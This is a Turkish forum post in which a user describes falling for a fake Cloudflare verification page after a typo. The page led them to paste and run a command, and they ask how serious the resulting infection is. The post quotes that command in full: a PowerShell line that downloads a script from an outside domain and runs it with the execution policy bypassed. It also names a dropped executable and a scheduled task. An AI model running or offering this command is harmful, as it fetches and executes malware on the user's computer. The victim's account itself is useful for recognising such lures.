ardayms

Uzman
Katılım
8 Temmuz 2025
Mesajlar
131
Çözümler
4
Beğeniler
47
Bir siteye girmek için tarayıcı çubuğuna sitenin adresini yazdım fakat 1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş o esnada bunun farkına varmadım, karşıma Cloudflare doğrulaması çıktı. Ekranda yazan talimatlar şu şekildeydi: "Windows + R -> CTRL + V -> Enter". İlk defa böyle bir doğrulama görmüştüm ama hiç şüphelenmedim. Yaptım. Daha sonra birşeylerin yanlış gittiğini farkettim, bilgisayarda ufak takılmalar ve açılıp kapanan CMD ekranları.

Çalıştırdığım komut şuydu: powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri 'https://animecelestialblaze.cfd/dl/gg.pro' -OutFile (Join-Path $env:TEMP 'lo.ps1'); " powershell -ExecutionPolicy Bypass -File "%TEMP%\lo.ps1"

Ekstra olarak "C:\Program Files\MSBuild\ielowutil.exe" konumunda "ielowutil.exe" adında bir uygulama vardı. Sildiğim için dosyayı burayı atamadım ama VT sonucu aşağıda:

VirusTotal

USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.

Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):

1788683674377.webp


1788683719519.webp


Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.
 
Son düzenleyen: Moderatör: